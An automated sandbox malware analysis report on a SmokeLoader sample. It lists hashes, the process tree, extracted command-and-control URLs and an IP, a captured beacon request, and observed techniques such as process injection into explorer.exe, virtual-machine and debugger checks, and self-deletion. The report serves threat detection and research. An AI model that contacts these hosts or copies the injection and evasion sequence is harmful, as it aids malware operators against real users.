Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6s1js8BzrC.exe

Overview

General Information

Sample Name:6s1js8BzrC.exe
Analysis ID:678081
MD5:c9948059cdc5e0aef9c193d605c7f659
SHA1:0c00b2242c86487e305d53aea8894100bda41035
SHA256:80f503f4fd7e84b614fc5a50888629178996402d10e245193136c0aee909b87b
Tags:ArkeiStealerexe
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to inject code into remote processes
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • 6s1js8BzrC.exe (PID: 1056 cmdline: "C:\Users\user\Desktop\6s1js8BzrC.exe" MD5: C9948059CDC5E0AEF9C193D605C7F659)
    • 6s1js8BzrC.exe (PID: 504 cmdline: "C:\Users\user\Desktop\6s1js8BzrC.exe" MD5: C9948059CDC5E0AEF9C193D605C7F659)
      • explorer.exe (PID: 3688 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • twtgjvf (PID: 2912 cmdline: C:\Users\user\AppData\Roaming\twtgjvf MD5: C9948059CDC5E0AEF9C193D605C7F659)
    • twtgjvf (PID: 2756 cmdline: C:\Users\user\AppData\Roaming\twtgjvf MD5: C9948059CDC5E0AEF9C193D605C7F659)
  • cleanup
{"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
SourceRuleDescriptionAuthorStrings
00000007.00000002.503883541.00000000004A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000002.00000002.445865427.0000000002051000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000002.00000002.445757308.0000000002030000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000007.00000002.503917126.00000000005B1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          00000003.00000000.423194052.0000000004D61000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            SourceRuleDescriptionAuthorStrings
            2.2.6s1js8BzrC.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              0.2.6s1js8BzrC.exe.24c15a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                7.2.twtgjvf.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  6.2.twtgjvf.24c15a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                    No Sigma rule has matched
                    Timestamp:192.168.2.634.118.39.1049722802851815 08/03/22-14:53:10.081323
                    SID:2851815
                    Source Port:49722
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 6s1js8BzrC.exeVirustotal: Detection: 41%Perma Link
                    Source: http://host-host-file8.com/URL Reputation: Label: malware
                    Source: host-file-host6.comVirustotal: Detection: 25%Perma Link
                    Source: host-host-file8.comVirustotal: Detection: 21%Perma Link
                    Source: C:\Users\user\AppData\Roaming\twtgjvfVirustotal: Detection: 41%Perma Link
                    Source: 6s1js8BzrC.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\twtgjvfJoe Sandbox ML: detected
                    Source: 00000007.00000002.503883541.00000000004A0000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
                    Source: 6s1js8BzrC.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Binary string: C:\betamiricakuvi\ferebegip\tij.pdb source: 6s1js8BzrC.exe, twtgjvf.3.dr
                    Source: Binary string: qa6C:\betamiricakuvi\ferebegip\tij.pdb`ZBT7@ source: 6s1js8BzrC.exe, twtgjvf.3.dr

                    Networking

                    barindex
                    Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                    Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                    Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.6:49722 -> 34.118.39.10:80
                    Source: Malware configuration extractorURLs: http://host-file-host6.com/
                    Source: Malware configuration extractorURLs: http://host-host-file8.com/
                    Source: Joe Sandbox ViewASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
                    Source: Joe Sandbox ViewIP Address: 34.118.39.10 34.118.39.10
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://foxtykohl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: host-file-host6.com
                    Source: explorer.exe, 00000003.00000000.412067253.000000000807C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.438079821.000000000807C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.395202609.000000000807C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://foxtykohl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: host-file-host6.com
                    Source: unknownDNS traffic detected: queries for: host-file-host6.com

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: Yara matchFile source: 2.2.6s1js8BzrC.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.6s1js8BzrC.exe.24c15a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.twtgjvf.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.twtgjvf.24c15a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.503883541.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.445865427.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.445757308.0000000002030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.503917126.00000000005B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.423194052.0000000004D61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: 6s1js8BzrC.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeCode function: 0_2_024C0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,0_2_024C0110
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeCode function: 2_2_0040180C Sleep,NtTerminateProcess,2_2_0040180C
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeCode function: 2_2_00401818 Sleep,NtTerminateProcess,2_2_00401818
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeCode function: 2_2_00401822 Sleep,NtTerminateProcess,2_2_00401822
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeCode function: 2_2_00401826 Sleep,NtTerminateProcess,2_2_00401826
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeCode function: 2_2_00401834 Sleep,NtTerminateProcess,2_2_00401834
                    Source: C:\Users\user\AppData\Roaming\twtgjvfCode function: 7_2_0040180C Sleep,NtTerminateProcess,7_2_0040180C
                    Source: C:\Users\user\AppData\Roaming\twtgjvfCode function: 7_2_00401818 Sleep,NtTerminateProcess,7_2_00401818
                    Source: C:\Users\user\AppData\Roaming\twtgjvfCode function: 7_2_00401822 Sleep,NtTerminateProcess,7_2_00401822
                    Source: C:\Users\user\AppData\Roaming\twtgjvfCode function: 7_2_00401826 Sleep,NtTerminateProcess,7_2_00401826
                    Source: C:\Users\user\AppData\Roaming\twtgjvfCode function: 7_2_00401834 Sleep,NtTerminateProcess,7_2_00401834
                    Source: 6s1js8BzrC.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6s1js8BzrC.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: twtgjvf.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: twtgjvf.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
                    Source: 6s1js8BzrC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: twtgjvf.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 6s1js8BzrC.exeVirustotal: Detection: 41%
                    Source: 6s1js8BzrC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\6s1js8BzrC.exe "C:\Users\user\Desktop\6s1js8BzrC.exe"
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeProcess created: C:\Users\user\Desktop\6s1js8BzrC.exe "C:\Users\user\Desktop\6s1js8BzrC.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\twtgjvf C:\Users\user\AppData\Roaming\twtgjvf
                    Source: C:\Users\user\AppData\Roaming\twtgjvfProcess created: C:\Users\user\AppData\Roaming\twtgjvf C:\Users\user\AppData\Roaming\twtgjvf
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeProcess created: C:\Users\user\Desktop\6s1js8BzrC.exe "C:\Users\user\Desktop\6s1js8BzrC.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\twtgjvfProcess created: C:\Users\user\AppData\Roaming\twtgjvf C:\Users\user\AppData\Roaming\twtgjvfJump to behavior
                    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\twtgjvfJump to behavior
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@6/2@4/1
                    Source: 6s1js8BzrC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: C:\betamiricakuvi\ferebegip\tij.pdb source: 6s1js8BzrC.exe, twtgjvf.3.dr
                    Source: Binary string: qa6C:\betamiricakuvi\ferebegip\tij.pdb`ZBT7@ source: 6s1js8BzrC.exe, twtgjvf.3.dr
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeCode function: 0_2_024C1977 push ebx; iretd 0_2_024C19B7
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeCode function: 0_2_024C1970 push ebx; iretd 0_2_024C19B7
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeCode function: 0_2_024C198B push ebx; iretd 0_2_024C19B7
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeCode function: 2_2_004011D0 push ebx; iretd 2_2_00401217
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeCode function: 2_2_004011D7 push ebx; iretd 2_2_00401217
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeCode function: 2_2_004011EB push ebx; iretd 2_2_00401217
                    Source: C:\Users\user\AppData\Roaming\twtgjvfCode function: 7_2_004011D0 push ebx; iretd 7_2_00401217
                    Source: C:\Users\user\AppData\Roaming\twtgjvfCode function: 7_2_004011D7 push ebx; iretd 7_2_00401217
                    Source: C:\Users\user\AppData\Roaming\twtgjvfCode function: 7_2_004011EB push ebx; iretd 7_2_00401217
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.427480094498362
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.427480094498362
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\twtgjvfJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\twtgjvfJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\6s1js8bzrc.exeJump to behavior
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\twtgjvf:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: 6s1js8BzrC.exe, 00000002.00000002.445204824.00000000001FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKS
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\twtgjvfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\twtgjvfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\twtgjvfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\twtgjvfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\twtgjvfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\twtgjvfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Windows\explorer.exe TID: 3524Thread sleep count: 562 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 1252Thread sleep count: 312 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 1252Thread sleep time: -31200s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 1012Thread sleep count: 272 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 5292Thread sleep count: 465 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 5560Thread sleep count: 209 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 5740Thread sleep count: 157 > 30Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 562Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 465Jump to behavior
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeSystem information queried: ModuleInformationJump to behavior
                    Source: explorer.exe, 00000003.00000000.437871494.0000000007FBD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: explorer.exe, 00000003.00000000.395202609.000000000807C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                    Source: explorer.exe, 00000003.00000000.437871494.0000000007FBD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}d
                    Source: explorer.exe, 00000003.00000000.395202609.000000000807C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000I
                    Source: explorer.exe, 00000003.00000000.395202609.000000000807C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                    Source: explorer.exe, 00000003.00000000.421057263.00000000042EE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q^
                    Source: explorer.exe, 00000003.00000000.420856788.00000000042A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000O

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeSystem information queried: CodeIntegrityInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\twtgjvfSystem information queried: CodeIntegrityInformationJump to behavior
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeCode function: 0_2_024C0042 push dword ptr fs:[00000030h]0_2_024C0042
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\twtgjvfProcess queried: DebugPortJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Windows\explorer.exeFile created: twtgjvf.3.drJump to dropped file
                    Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                    Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                    Source: C:\Users\user\AppData\Roaming\twtgjvfSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\twtgjvfSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeMemory written: C:\Users\user\Desktop\6s1js8BzrC.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeCode function: 0_2_024C0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,0_2_024C0110
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeThread created: C:\Windows\explorer.exe EIP: 4D61930Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\twtgjvfThread created: unknown EIP: 4D81930Jump to behavior
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeProcess created: C:\Users\user\Desktop\6s1js8BzrC.exe "C:\Users\user\Desktop\6s1js8BzrC.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\twtgjvfProcess created: C:\Users\user\AppData\Roaming\twtgjvf C:\Users\user\AppData\Roaming\twtgjvfJump to behavior
                    Source: explorer.exe, 00000003.00000000.408072314.00000000058B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.403568809.000000000081C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.418961949.0000000000D70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: explorer.exe, 00000003.00000000.403341955.0000000000778000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.377857190.0000000000778000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.418961949.0000000000D70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: explorer.exe, 00000003.00000000.418961949.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.378068314.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.403800249.0000000000D70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: explorer.exe, 00000003.00000000.418961949.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.378068314.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.403800249.0000000000D70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\Desktop\6s1js8BzrC.exeCode function: 0_2_0041CC30 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0041CC30

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 2.2.6s1js8BzrC.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.6s1js8BzrC.exe.24c15a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.twtgjvf.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.twtgjvf.24c15a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.503883541.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.445865427.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.445757308.0000000002030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.503917126.00000000005B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.423194052.0000000004D61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 2.2.6s1js8BzrC.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.6s1js8BzrC.exe.24c15a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.twtgjvf.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.twtgjvf.24c15a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.503883541.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.445865427.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.445757308.0000000002030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.503917126.00000000005B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.423194052.0000000004D61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts1
                    Exploitation for Client Execution
                    1
                    DLL Side-Loading
                    512
                    Process Injection
                    11
                    Masquerading
                    OS Credential Dumping1
                    System Time Discovery
                    Remote ServicesData from Local SystemExfiltration Over Other Network Medium2
                    Non-Application Layer Protocol
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading
                    12
                    Virtualization/Sandbox Evasion
                    LSASS Memory411
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth112
                    Application Layer Protocol
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)512
                    Process Injection
                    Security Account Manager12
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                    Hidden Files and Directories
                    NTDS2
                    Process Discovery
                    Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information
                    LSA Secrets1
                    Application Window Discovery
                    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common2
                    Software Packing
                    Cached Domain Credentials4
                    System Information Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    DLL Side-Loading
                    DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                    File Deletion
                    Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
